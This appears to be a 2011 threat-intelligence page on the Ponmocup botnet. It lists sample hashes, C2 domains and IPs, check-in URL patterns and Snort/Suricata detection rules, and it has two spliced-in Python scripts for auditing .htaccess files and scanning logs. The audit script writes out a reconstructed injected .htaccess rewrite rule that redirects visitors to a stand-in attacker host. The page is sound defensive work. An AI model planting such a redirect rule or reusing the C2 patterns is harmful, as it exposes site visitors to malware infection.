This page collects links and details about the Ponmocup malware / botnet.
We've discovered several infected hosts and have malware samples, memory dumps (Memoryze) and C&C traffic details available upon request.

Please send comments and questions to:  toms.security.stuff -at- gmail.com

Work in progress... (created on 2011-05-30 / updated: 2011-06-24)

General links

  How big is the Ponmocup botnet?
  www.abuse.ch blog: How Big is Big? Some Botnet Statistics
  Infection through hacked web servers: website hacked with extra .htaccess in all folders and ROOT folder??

>>> Have you checked your logs for access to these malicious domains / IPs yet? (updated: 2011-06-24) <<<

  infernomag.com / gtracking.org nastiness
  Bot Network classification inquiry
  SOPHOS: Mal/Ponmocup-A (detailed analysis of 3 samples)
    Malware sample MD5s: 820ed1d99e2b771d915e033450fa0b0f
                         bd291073fc2cb39456886d091a5ee85c
                         593af63840f11883610ba95d6744c4b1
    The above analysis shows that binary code is also stored in several registry keys. We were also able to extract such registry "blobs" from infected hosts, some keys larger than 100 KB. These could be (encrypted) malware components. (?)
  SOPHOS: Troj/Mdrop-CLC
  ThreatExpert analysis (also shows registry entries)
  Microsoft MPC: TrojanDownloader:Win32/Ponmocup.A
  Troublesome Trojan Trammels Torrent Sites (from 2010/11/24 !)
  The Pirate Bay and Mininova Blocked by Mysterious New Trojan
  New Trojan Blocks Access To Bittorrent Websites: Webroot
  Media Site Pimping Malware
  TrendMicro: TSPY_PIRMINAY.A
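A host-side check for the "extra .htaccess in all folders" infection mentioned in the links above. This is an added example, not code from this page or its author: it walks a document root, reports every directory that carries an .htaccess at all (the infection drops one into each folder), and flags RewriteRule lines whose target is an absolute external URL or that carry the r.cgi / mod_rewrite-variable redirect shape seen in the infection URL pattern. The injected rule text, the attacker host hacked.example.net and the p= value are hypothetical reconstructions built from that URL pattern, not something the page publishes; the demo webroot is constructed in a temporary directory.

```python
"""Added example (not from the original page): audit a webroot for injected
.htaccess rewrite rules of the kind used to redirect visitors into the
Ponmocup infection chain."""
import os
import re
import tempfile
from typing import Dict, List

# Hypothetical injected rule, reconstructed from the r.cgi URL pattern on this
# page (the attacker host and the p= value are made up; real files may differ).
INJECTED_HTACCESS = (
    "RewriteEngine On\n"
    "RewriteRule ^(.*)$ http://hacked.example.net/cgi-bin/r.cgi?p=1234"
    "&h=%{HTTP_HOST}&u=%{REQUEST_URI}&q=%{QUERY_STRING}&t=%{TIME} [L]\n"
)
# A legitimate .htaccess: internal redirect only, nothing to flag.
BENIGN_HTACCESS = (
    "Options -Indexes\n"
    "RewriteEngine On\n"
    "RewriteRule ^old/(.*)$ /new/$1 [R=301,L]\n"
)

REWRITE_RE = re.compile(r"^\s*RewriteRule\s+(?P<pattern>\S+)\s+(?P<target>\S+)", re.I)
EXTERNAL_RE = re.compile(r"^https?://", re.I)


def suspicious_rewrites(text: str) -> List[str]:
    """Return RewriteRule lines whose substitution is an absolute external URL,
    or that reference the r.cgi redirector / the %{HTTP_HOST} variable seen in
    the infection URL. Internal rewrites (targets starting with /) pass."""
    hits = []
    for line in text.splitlines():
        m = REWRITE_RE.match(line)
        if not m:
            continue
        target = m.group("target")
        if EXTERNAL_RE.match(target) or "r.cgi" in target.lower() or "%{HTTP_HOST}" in target:
            hits.append(line.strip())
    return hits


def audit_webroot(root: str) -> Dict[str, List[str]]:
    """Map every .htaccess under root (path relative to root) to its suspicious
    rules; an empty list means the file exists but looks clean. Listing clean
    files too matters here, because the infection plants one in every folder."""
    report: Dict[str, List[str]] = {}
    for dirpath, _dirs, files in os.walk(root):
        if ".htaccess" in files:
            p = os.path.join(dirpath, ".htaccess")
            with open(p, encoding="utf-8", errors="replace") as fh:
                report[os.path.relpath(p, root)] = suspicious_rewrites(fh.read())
    return report


def build_demo_webroot() -> str:
    """Constructed sample: root/, img/ and img/thumbs/ carry the injected
    .htaccess, blog/ keeps a legitimate one."""
    root = tempfile.mkdtemp(prefix="ponmocup_demo_")
    for rel in ("", "img", os.path.join("img", "thumbs")):
        d = os.path.join(root, rel)
        os.makedirs(d, exist_ok=True)
        with open(os.path.join(d, ".htaccess"), "w") as fh:
            fh.write(INJECTED_HTACCESS)
    os.makedirs(os.path.join(root, "blog"))
    with open(os.path.join(root, "blog", ".htaccess"), "w") as fh:
        fh.write(BENIGN_HTACCESS)
    return root


if __name__ == "__main__":
    for path, rules in sorted(audit_webroot(build_demo_webroot()).items()):
        print(path, "INFECTED" if rules else "clean", *rules)
```

Point audit_webroot at the real document root of a suspect server. A burst of .htaccess files in directories that never needed one (image folders, upload directories) is itself a strong signal even before looking at the rule text; the external-URL check then tells you where visitors were being sent.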
C&C traffic details

Infection step (redirect from a hacked web server):
  URL pattern: /cgi-bin/r.cgi?p=...&h=%{HTTP_HOST}&u=%{REQUEST_URI}&q=%{QUERY_STRING}&t=%{TIME}
  Domain / IP: many domains / IPs of infected servers!
  (The %{...} tokens are Apache mod_rewrite server variables: the injected .htaccess rewrites requests into this redirect and passes along the original host, URI, query string and time.)
  * NEW * List of infected and malware-hosting domains / IPs: HTML / TXT (updated: 2011-06-22)

After executing the downloaded .COM-file infector:
  URL pattern: /html/license_43EC922...[long hex string].html
  Domain / IP: checkwebspeed.net / 95.211.8.196
  Assumed "phone home": get commands, send stolen data, download further malware... (?)

  URL pattern: /images2/BD35...[long hex string].swf
  Domain / IP: 94.75.234.107, 85.17.139.239, marksandco.net / 94.75.234.98, omniwebpro.org / 94.75.201.35

  URL pattern: /cgi-bin/shopping3.cgi?a=[long hex string]
               /cgi-bin/unshopping3.cgi?b=[long hex string]
  (request to some other domain with a large download -- malware update?)
  Domain / IP: amegatech.net / 94.75.234.98

  URL pattern: /cgi-bin/rokfeller3.cgi?v=11 (with a long hex string in the POST body -- some sample data available)
  Domain / IP: intermediacorp.org / 85.17.188.195

Domains & IPs identified for C2 traffic:

  omniwebpro.org      94.75.201.35    (first used 2011-03-18)
  85.17.139.239       85.17.139.239   (first used 2011-03-17)
  rapidstream.biz     85.17.139.238   (first used 2011-03-15)
  intermediacorp.org  85.17.188.195   (first used 2011-03-14)
  94.75.201.36        94.75.201.36    (first used 2011-03-11)
  amegatech.net       94.75.234.98    (first used 2011-03-04)
  marksandco.net      94.75.234.98    (used from 2010-02-26 to 2011-03-03)
  inetspeedup.com     94.75.234.98    (first used 2011-02-17)
  94.75.234.107       94.75.234.107   (first used 2011-02-12)

Domains / IPs used from 2010-02-24 to 2011-02-11:

  amegatech.net       174.36.82.151   (first used 2011-02-06)
  inetspeedup.com     174.36.82.151   (first used 2011-01-19)
  marksandco.net      174.36.82.151   (first used 2010-03-07)
  174.36.82.151       174.36.82.151   (first used 2010-03-01)
  mtuconnectwall.org  174.36.82.151   (used from 2010-02-24 to 2010-10-27)

>>> List of malicious domains / IPs <<< (updated: 2011-06-24)
Snort rules (from Emerging Threats; the "alert http" header and http_uri keywords are Suricata syntax)

http://rules.emergingthreats.net/open-nogpl/suricata/rules/emerging-current_events.rules

alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"ET CURRENT_EVENTS SEO FAKE AV Win32.Ponmocup Checkin"; flow:established,to_server; content:"GET"; http_method; content:"/html/license_"; http_uri; nocase; pcre:"/\/html\/license_[0-9A-F]{550,}\.html/Ui"; classtype:trojan-activity; sid:2011969; rev:7;)

alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"ET CURRENT_EVENTS Possibly Ponmocup Encoded URI Checkins"; flow:established,to_server; content:"/images2/"; nocase; http_uri; pcre:"/^\/images2\/[0-9a-fA-F]{500,}/U"; classtype:trojan-activity; reference:url,malwaresurvival.net/2011/04/21/media-site-pimping-malware/; reference:url,community.websense.com/forums/p/10728/23862.aspx; reference:url,www.microsoft.com/security/portal/Threat/Encyclopedia/Entry.aspx?ThreatID=146443; sid:2012799; rev:2;)

alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"ET CURRENT_EVENTS Possibly Ponmocup Sending Data to Controller"; flow:established,to_server; content:"/cgi-bin/rokfeller3.cgi?v=11"; nocase; http_uri; classtype:trojan-activity; reference:url,malwaresurvival.net/2011/04/21/media-site-pimping-malware/; reference:url,community.websense.com/forums/p/10728/23862.aspx; reference:url,www.microsoft.com/security/portal/Threat/Encyclopedia/Entry.aspx?ThreatID=146443; sid:2012800; rev:2;)
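The log check this page asks for ("Have you checked your logs for access to these malicious domains / IPs yet?"), as an added example that is not part of the original page: a Python sweep over proxy-style log lines that flags any request to the C2 / malware-hosting hosts listed under "C&C traffic details" above, and any URI matching the Emerging Threats rules quoted above (sid 2011969, 2012799, 2012800) or the r.cgi redirect and shopping3/unshopping3 requests described earlier. The log line format (epoch, client IP, method, URL) and the sample lines are constructed for the demo; the hex strings in them are padded past the 550 / 500 character thresholds the ET rules use.

```python
"""Added example (not from the original page): sweep proxy-style log lines for
the Ponmocup C2 hosts and URI patterns collected on this page."""
import re
from typing import Dict, List, Optional

# C2 / malware-hosting domains and IPs from the page's "C&C traffic details" list.
PONMOCUP_HOSTS = {
    "checkwebspeed.net", "95.211.8.196",
    "omniwebpro.org", "94.75.201.35", "85.17.139.239", "rapidstream.biz",
    "85.17.139.238", "intermediacorp.org", "85.17.188.195", "94.75.201.36",
    "amegatech.net", "94.75.234.98", "marksandco.net", "inetspeedup.com",
    "94.75.234.107", "174.36.82.151", "mtuconnectwall.org",
}

# URI patterns. The first three mirror the Emerging Threats rules quoted above
# (sid 2011969, 2012799, 2012800), including their minimum hex lengths; the last
# two cover the shopping3/unshopping3 update requests and the r.cgi redirect.
URI_PATTERNS = [
    ("ponmocup_checkin_license",  re.compile(r"^/html/license_[0-9A-F]{550,}\.html", re.I)),
    ("ponmocup_images2_checkin",  re.compile(r"^/images2/[0-9a-fA-F]{500,}")),
    ("ponmocup_rokfeller3_post",  re.compile(r"^/cgi-bin/rokfeller3\.cgi\?v=11", re.I)),
    ("ponmocup_shopping3_update", re.compile(r"^/cgi-bin/(un)?shopping3\.cgi\?[ab]=[0-9a-fA-F]+", re.I)),
    ("ponmocup_rcgi_redirect",    re.compile(r"^/cgi-bin/r\.cgi\?p=[^&]*&h=", re.I)),
]

# Constructed log format: "<epoch> <client-ip> <method> <url>", one request per line.
LOG_RE = re.compile(r"^(?P<ts>\S+)\s+(?P<client>\S+)\s+(?P<method>[A-Z]+)\s+(?P<url>\S+)")
URL_RE = re.compile(r"^https?://(?P<host>[^/:]+)(?::\d+)?(?P<path>/\S*)?$", re.I)


def check_line(line: str) -> Optional[Dict[str, object]]:
    """Return a hit record if the line touches a known host or a Ponmocup URI
    pattern, else None. Unparseable lines are skipped rather than aborting the sweep."""
    m = LOG_RE.match(line)
    if not m:
        return None
    u = URL_RE.match(m.group("url"))
    if not u:
        return None
    host = u.group("host").lower()
    path = u.group("path") or "/"
    reasons: List[str] = []
    if host in PONMOCUP_HOSTS:
        reasons.append("known_c2_host:" + host)
    reasons.extend(name for name, rx in URI_PATTERNS if rx.match(path))
    if not reasons:
        return None
    return {"ts": m.group("ts"), "client": m.group("client"), "method": m.group("method"),
            "host": host, "path": path, "reasons": reasons}


def scan(lines) -> List[Dict[str, object]]:
    """Run check_line over an iterable of log lines and keep only the hits."""
    return [hit for hit in map(check_line, lines) if hit]


# Constructed sample log: five requests matching page indicators and one clean one.
SAMPLE_LOG = [
    f"1308700000.123 10.0.0.5 GET http://checkwebspeed.net/html/license_{'A' * 560}.html",
    f"1308700001.456 10.0.0.5 GET http://94.75.234.107/images2/{'b' * 520}.swf",
    "1308700002.789 10.0.0.7 POST http://intermediacorp.org/cgi-bin/rokfeller3.cgi?v=11",
    "1308700003.000 10.0.0.9 GET http://downloads.example.com/cgi-bin/shopping3.cgi?a=0badf00d",
    "1308700004.000 10.0.0.9 GET http://www.example.org/index.html",
    "1308700005.000 10.0.0.11 GET http://hacked.example.net/cgi-bin/r.cgi?p=1234"
    "&h=www.example.net&u=/page.html&q=&t=1308700005",
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit["client"], hit["method"], hit["host"], hit["path"][:60], ",".join(hit["reasons"]))
```

The host list is the more durable indicator here: the URI regexes inherit the 550 / 500 hex-character minimums from the ET rules, so a shorter check-in would slip past them, while a request to any of the listed domains or IPs is flagged regardless of path. Swap LOG_RE for your own proxy or web server log format; the rest of the logic is format independent.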
Malware samples

The following 3 samples were extracted from infected hosts (note that the file names look like legitimate DLL names with one extra character appended):

  ced3103e366d2eeac145639b080b3426  HPZipm12L.dll  (VT results 33 / 43)
  dfe859eda8d9ed88863896ac233b17a9  crtdllo.dll    (VT results 16 / 42)
  04366dfaa4a7d32066fa6dcda14c9e94  ole32H.dll     (VT results 12 / 42)

Update 2011-06-22: current VT detections from 2011-06-22 / list of signature names from AVs
written with the most powerful HTML editor --> vi ;-)